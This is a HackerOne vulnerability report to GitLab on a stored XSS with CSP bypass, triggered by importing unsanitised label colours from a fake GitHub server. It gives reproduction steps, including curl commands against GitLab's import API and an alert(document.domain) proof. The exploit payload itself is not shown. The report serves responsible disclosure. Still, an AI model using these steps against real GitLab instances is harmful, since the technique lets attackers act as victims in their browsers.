Stored-XSS with CSP-bypass via labels' color
HackerOne report #1665658 by yvvdwf
on 2022-08-10, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Gitlab allows to import a project from Github. It imports also the labels whose colors are not sanitized. This leads to Stored-XSS.
Step to reproduce
To reproduce, we need the following prerequisite:
- Github does not allow neither to create arbitrary label colors. You can find in the attachment a dummy Github server
- A VM/machine to host the dummy server above with an public IP though that gitlab.com can access to.
- I created the dummy server using nodejs, so you need to have also nodejs on the machine
- A Gitlab personal access token. Go here to create a new token with within
api
scope.
Step 1: run the dummy server
- Copy the attachment file on your machine and decompress it to any folder, e.g.,
/tmp/dummy-server
- Go to
/tmp/dummy-server
then run this command:node ./index.js YOUR_IP YOUR_PORT
in which, you should replaceIP
andPORT
with the one you have. For example,sudo node index.js 51.75.74.52 80
Step 2: trigger Gitlab import
-
Open a new terminal, then run the following command in which:
-
YOUR_IP
andYOUR_PORT
by the values in the previous step -
YOUR_GITLAB_TOKEN
is the api token you've created in the pre-requirement -
YOUR_GITLAB_USERNAME
is the target namespace you want to import the project to. It can be your username, or a group name
-
curl -kv "https://gitlab.com/api/v4/import/github" \
--request POST \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: YOUR_GITLAB_TOKEN" \
--data '{
"personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"repo_id": "523303538",
"target_namespace": "YOUR_GITLAB_USERNAME",
"new_name": "xss-on-label-color",
"github_hostname": "http://YOUR_IP:YOUR_PORT"
}'
For example:
curl -kv "https://gitlab.com/api/v4/import/github" \
--request POST \
--header "content-type: application/json" \
--header "PRIVATE-TOKEN: AAAAAAAAAAAAAYYYYabc" \
--data '{
"personal_access_token": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"repo_id": "523303538",
"target_namespace": "yvvdwf",
"new_name": "xss-on-label-color",
"github_hostname": "http://51.75.74.52:80"
}'
After finishing, you can view the list of the labels of the imported project. You should see an popup created by this js alert(document.domain)
An example is available here (private project): https://gitlab.com/yvvdwf/xss-on-label-color/-/labels
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: